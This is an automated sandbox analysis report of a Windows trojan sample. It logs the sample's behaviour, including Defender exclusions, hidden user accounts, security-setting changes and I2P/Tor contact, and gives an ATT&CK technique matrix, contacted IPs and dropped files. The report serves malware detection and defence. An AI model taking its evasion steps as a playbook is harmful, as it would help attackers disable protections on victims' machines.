Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\lr75sq5smrngkif9fpn.exeCode function: 13_2_00007FF7E3CE6FD5 GetSystemTimeAsFileTime,13_2_00007FF7E3CE6FD5
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB22706DA3 LocalAlloc,wcsncpy,LookupAccountNameW,GetLastError,GetLastError,LocalAlloc,LookupAccountNameW,LocalFree,GetLastError,ConvertSidToStringSidA,GetLastError,wcslen,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,29_2_00007FFB22706DA3
Source: C:\Users\user\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

barindex
Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Provider\Av\{D68DDC3A-831F-4fae-9E44-DA132C1ACF46} STATEJump to behavior
Source: svchost.exe, 00000004.00000002.2527090357.000001F3CD902000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gramFiles%\Windows Defender\MsMpeng.exe
Source: svchost.exe, 00000004.00000002.2527090357.000001F3CD902000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: lr75sq5smrngkif9fpn.exe, 0000000D.00000002.1312495889.0000025BBA428000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe
Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB227058DA socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,29_2_00007FFB227058DA
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB2273AEAA socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,29_2_00007FFB2273AEAA
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB22761F9A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,29_2_00007FFB22761F9A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB23AB28BA socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,29_2_00007FFB23AB28BA
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB23ACB820 listen,htons,recv,select,29_2_00007FFB23ACB820
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB23ACB7E8 bind,29_2_00007FFB23ACB7E8
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB23AD418A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,29_2_00007FFB23AD418A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB23B015FA socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,29_2_00007FFB23B015FA
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
2
Valid Accounts
11
Windows Management Instrumentation
1
Scripting
1
DLL Side-Loading
21
Disable or Modify Tools
1
Network Sniffing
1
System Time Discovery
Remote Services1
Archive Collected Data
1
Ingress Tool Transfer
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts3
Native API
1
DLL Side-Loading
2
Valid Accounts
1
Deobfuscate/Decode Files or Information
LSASS Memory1
Account Discovery
Remote Desktop ProtocolData from Removable Media1
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts2
Command and Scripting Interpreter
1
Create Account
2
Access Token Manipulation
2
Obfuscated Files or Information
Security Account Manager1
System Service Discovery
SMB/Windows Admin SharesData from Network Shared Drive1
Non-Standard Port
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts3
Service Execution
2
Valid Accounts
14
Windows Service
1
Timestomp
NTDS3
File and Directory Discovery
Distributed Component Object ModelInput Capture1
Non-Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchd14
Windows Service
11
Process Injection
1
DLL Side-Loading
LSA Secrets1
Network Sniffing
SSHKeylogging1
Application Layer Protocol
Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled Task1
Services File Permissions Weakness
1
Services File Permissions Weakness
1
File Deletion
Cached Domain Credentials35
System Information Discovery
VNCGUI Input Capture1
Proxy
Data Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
Masquerading
DCSync1
Network Share Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
Valid Accounts
Proc Filesystem261
Security Software Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt2
Access Token Manipulation
/etc/passwd and /etc/shadow151
Virtualization/Sandbox Evasion
Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron151
Virtualization/Sandbox Evasion
Network Sniffing2
Process Discovery
Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd11
Process Injection
Input Capture1
Application Window Discovery
Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
Hidden Users
Keylogging1
System Owner/User Discovery
Taint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
Services File Permissions Weakness
GUI Input Capture1
System Network Configuration Discovery
Replication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1517355 Sample: file.exe Startdate: 25/09/2024 Architecture: WINDOWS Score: 100 83 time.windows.com 2->83 97 Suricata IDS alerts for network traffic 2->97 99 NDIS Filter Driver detected (likely used to intercept and sniff network traffic) 2->99 101 Contains functionality to hide user accounts 2->101 103 7 other signatures 2->103 9 main.exe 2->9         started        14 file.exe 3 2->14         started        16 main.exe 2->16         started        18 11 other processes 2->18 signatures3 process4 dnsIp5 85 184.65.173.183 SHAWCA Canada 9->85 87 88.210.6.42 CITYLAN-ASRU Russian Federation 9->87 95 47 other IPs or domains 9->95 71 C:\Windows\Temp\x8eec9dQ, PE32+ 9->71 dropped 73 C:\Windows\Temp\nHqxqt5L, PE32+ 9->73 dropped 75 C:\Windows\Temp\miECvZvT, PE32+ 9->75 dropped 81 15 other files (13 malicious) 9->81 dropped 117 Contains functionality to hide user accounts 9->117 119 Found Tor onion address 9->119 20 WerFault.exe 9->20         started        89 94.156.68.124, 1122, 49700 TERASYST-ASBG Bulgaria 14->89 77 C:\Users\user\...\yhar2he6rpt6n0h1w6rh.exe, PE32+ 14->77 dropped 79 C:\Users\user\...\lr75sq5smrngkif9fpn.exe, PE32+ 14->79 dropped 23 yhar2he6rpt6n0h1w6rh.exe 10 14->23         started        26 cmd.exe 1 14->26         started        28 lr75sq5smrngkif9fpn.exe 3 14->28         started        91 139.162.110.14 LINODE-APLinodeLLCUS Netherlands 16->91 93 2.135.133.55 KAZTELECOM-ASKZ Kazakhstan 16->93 121 Query firmware table information (likely to detect VMs) 18->121 123 Changes security center settings (notifications, updates, antivirus, firewall) 18->123 30 MpCmdRun.exe 18->30         started        32 WerFault.exe 18->32         started        file6 signatures7 process8 file9 67 C:\ProgramData\Microsoft\...\Report.wer, Unicode 20->67 dropped 69 C:\Users\Public\...\main.exe, PE32+ 23->69 dropped 105 Multi AV Scanner detection for dropped file 23->105 107 Contains functionality to hide user accounts 23->107 109 Machine Learning detection for dropped file 23->109 111 Found Tor onion address 23->111 34 taskkill.exe 23->34         started        36 sc.exe 23->36         started        38 sc.exe 23->38         started        51 4 other processes 23->51 113 Adds a directory exclusion to Windows Defender 26->113 40 powershell.exe 23 26->40         started        43 powershell.exe 23 26->43         started        45 powershell.exe 17 26->45         started        47 conhost.exe 26->47         started        49 conhost.exe 30->49         started        signatures10 process11 signatures12 53 conhost.exe 34->53         started        55 conhost.exe 36->55         started        57 conhost.exe 38->57         started        115 Loading BitLocker PowerShell Module 40->115 59 conhost.exe 51->59         started        61 conhost.exe 51->61         started        63 conhost.exe 51->63         started        65 conhost.exe 51->65         started        process13

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
file.exe3%ReversingLabs
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exe100%Joe Sandbox ML
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll0%ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll0%ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dll0%ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\libi2p.dll0%ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe11%ReversingLabsWin64.Trojan.Barys
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.dll0%ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.dll0%ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rfxvmt.dll0%ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.dll0%ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\lr75sq5smrngkif9fpn.exe3%ReversingLabs
C:\Users\user\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exe19%ReversingLabsWin64.Trojan.Barys
C:\Windows\Temp\T9229YlC0%ReversingLabs
C:\Windows\Temp\TLbqzKsW0%ReversingLabs
C:\Windows\Temp\UEptccWa0%ReversingLabs
C:\Windows\Temp\VPIOcgIO0%ReversingLabs
C:\Windows\Temp\e5xaOqBz0%ReversingLabs
C:\Windows\Temp\fQQIqQM00%ReversingLabs
C:\Windows\Temp\miECvZvT0%ReversingLabs
C:\Windows\Temp\nHqxqt5L0%ReversingLabs
C:\Windows\Temp\x8eec9dQ0%ReversingLabs
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://schemas.xmlsoap.org/soap/envelope/0%URL Reputationsafe
https://i2pseed.creativecowpat.net:8443/0%Avira URL Cloudsafe
https://dev.ditu.live.com/REST/v1/Routes/0%Avira URL Cloudsafe
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue0%Avira URL Cloudsafe
http://schemas.xmlsoap.org/ws/2005/02/trust/Issueure0%Avira URL Cloudsafe
https://dev.virtualearth.net/REST/v1/Transit/Schedules/0%Avira URL Cloudsafe
https://dev.virtualearth.net/REST/v1/Routes/Walking0%Avira URL Cloudsafe
https://login.microsoftonline.com/ppsecure/ResolveUser.srf0%Avira URL Cloudsafe
https://reseed.memcpy.io/0%Avira URL Cloudsafe
https://dev.ditu.live.com/REST/v1/Imagery/Copyright/0%Avira URL Cloudsafe
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdA0%Avira URL Cloudsafe
https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf.0%Avira URL Cloudsafe
https://login.microsoftonline.com/ppsecure/devicechangecredential.srf0%Avira URL Cloudsafe
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAA0%Avira URL Cloudsafe
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdesAAAA0%Avira URL Cloudsafe
https://account.live.com/InlineSignup.aspx?iww=1&id=805020%Avira URL Cloudsafe
https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf0%Avira URL Cloudsafe
https://banana.incognet.io/0%Avira URL Cloudsafe
https://t0.ssl.ak.dynamic.tiles.virt0%Avira URL Cloudsafe
http://www.bingmapsportal.com0%Avira URL Cloudsafe
https://dev.virtualearth.net/REST/v1/Imagery/Copyright/0%Avira URL Cloudsafe
http://Passport.NET/tb_0%Avira URL Cloudsafe
https://t0.ssl.ak00%Avira URL Cloudsafe
http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt0%Avira URL Cloudsafe
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=0%Avira URL Cloudsafe
https://dev.virtualearth.net/REST/v1/Routes/0%Avira URL Cloudsafe
https://reseed-fr.i2pd.xyz/0%Avira URL Cloudsafe
https://i2p.novg.net/0%Avira URL Cloudsafe
https://account.live.com/msangcwam0%Avira URL Cloudsafe
https://login.microsoftonline.com/ppsecure/DeviceAssociate.srfJ0%Avira URL Cloudsafe
https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=0%Avira URL Cloudsafe
http://passport.net/tb0%Avira URL Cloudsafe
http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt/0%Avira URL Cloudsafe
https://i2p.ghativega.in/0%Avira URL Cloudsafe
https://www2.mk16.de/0%Avira URL Cloudsafe
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=0%Avira URL Cloudsafe
http://reg.i2p/hosts.txt0%Avira URL Cloudsafe
https://dev.virtualearth.net/REST/v1/Locations0%Avira URL Cloudsafe
https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/0%Avira URL Cloudsafe
https://t0.ssl.ak.dynamic.tiles.virtualearth.0%Avira URL Cloudsafe
https://t0.ssl.ak.dynamic.tiles.virtuxA0%Avira URL Cloudsafe
http://identiguy.i2p/hosts.txt0%Avira URL Cloudsafe
https://dynamic.t0%Avira URL Cloudsafe
https://reseed.diva.exchange/0%Avira URL Cloudsafe
https://dev.virtualearth.net/REST/v1/Routes/Transit0%Avira URL Cloudsafe
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue0%Avira URL Cloudsafe
https://i2pd.readthedocs.io/en/latest/user-guide/configuration/0%Avira URL Cloudsafe
https://reseed.stormycloud.org/0%Avira URL Cloudsafe
http://schemas.xmlsoap.org/ws/2005/02/trust/Issuee0%Avira URL Cloudsafe
https://login.ecur0%Avira URL Cloudsafe
https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=0%Avira URL Cloudsafe
https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/0%Avira URL Cloudsafe
https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=0%Avira URL Cloudsafe
http://reg.i2p/hosts.txtc0%Avira URL Cloudsafe
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdmlns:0%Avira URL Cloudsafe
https://dev.virtualearth.net/REST/v1/Routes/Driving0%Avira URL Cloudsafe
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx0%Avira URL Cloudsafe
https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf0%Avira URL Cloudsafe
https://reseed.stormycloud.org/o0%Avira URL Cloudsafe
https://login.microsoftonline.com/ppsecure/DeviceQuery.srf0%Avira URL Cloudsafe
https://reseed.stormycloud.org/r0%Avira URL Cloudsafe
http://schemas.xmlsoap.org/ws/2005/02/trust0%Avira URL Cloudsafe
https://login.livco0%Avira URL Cloudsafe
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAA0%Avira URL Cloudsafe
https://reseed.i2pgit.org/0%Avira URL Cloudsafe
http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txti2p.su30%Avira URL Cloudsafe
https://login.microsoftonline.com/MSARST2.srf0%Avira URL Cloudsafe
http://Passport.NET/STS0%Avira URL Cloudsafe
https://reseed-pl.i2pd.xyz/0%Avira URL Cloudsafe
https://dev.ditu.live.com/mapcontrol/logging.ashx0%Avira URL Cloudsafe
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=0%Avira URL Cloudsafe
http://stats.i2p/cgi-bin/newhosts.txt0%Avira URL Cloudsafe
https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf%0%Avira URL Cloudsafe
http://127.0.0.1:81180%Avira URL Cloudsafe
https://reseed.stormycloud.org/W0%Avira URL Cloudsafe
https://login.microsoftonline.com/ppsecure/DeviceQuery.srf-0%Avira URL Cloudsafe
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAAA0%Avira URL Cloudsafe
http://docs.oasis-open.org/wss/280%Avira URL Cloudsafe
https://reseed.onion.im/0%Avira URL Cloudsafe
https://i2p.mooo.com/netDb/0%Avira URL Cloudsafe
http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsd0%Avira URL Cloudsafe
https://reseed2.i2p.net/0%Avira URL Cloudsafe
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd0%Avira URL Cloudsafe
https://login.microsoftonline.com/ppsecure/devicechangecredential.srfMM0%Avira URL Cloudsafe
https://reseed.stormycloud.org/c0%Avira URL Cloudsafe
https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/0%Avira URL Cloudsafe
https://account.live.com/inlinesignup.aspx?iww=1&amp;id=806010%Avira URL Cloudsafe
https://signup.live.com/signup.aspx0%Avira URL Cloudsafe
https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx0%Avira URL Cloudsafe
https://account.live.com/inlinesignup.aspx?iww=1&amp;id=806000%Avira URL Cloudsafe
http://schemas.xmlsoap.org/ws/2004/09/policy0%Avira URL Cloudsafe
https://dev.ditu.live.com/REST/v1/Transit/Stops/0%Avira URL Cloudsafe
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous0%Avira URL Cloudsafe
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAAAAA0%Avira URL Cloudsafe
https://account.live.com/inlinesignup.aspx?iww=1&amp;id=806030%Avira URL Cloudsafe
https://reseed.i2p-projekt.de/0%Avira URL Cloudsafe
https://dev.virtualearth.net/REST/v1/Traffic/Incidents/0%Avira URL Cloudsafe
https://account.live.com/inlinesignup.aspx?iww=1&amp;id=806050%Avira URL Cloudsafe
http://reg.i2p/hosts.txtp/0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
time.windows.com
unknown
unknownfalse
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 00000000.00000002.1365909778.000001A7F5068000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1364470645.000001A7F5067000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://i2pseed.creativecowpat.net:8443/main.exe, 00000029.00000002.2528754555.000001FE46EDD000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000029.00000002.2530936773.00007FFB0C164000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.18.drtrue
    • Avira URL Cloud: safe
    unknown
    https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 00000000.00000003.1364800433.000001A7F5057000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365782760.000001A7F5058000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://reseed.memcpy.io/main.exe, 00000029.00000002.2528754555.000001FE46EDD000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000029.00000002.2530936773.00007FFB0C164000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.18.drtrue
    • Avira URL Cloud: safe
    unknown
    https://login.microsoftonline.com/ppsecure/ResolveUser.srfsvchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989259240.0000029864940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526898399.0000029864045000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989213625.000002986493B000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://schemas.xmlsoap.org/ws/2005/02/trust/Issueuresvchost.exe, 00000028.00000003.2225363797.000002986496D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2236542045.000002986496E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2528233861.000002986495F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2169550030.000002986496E000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
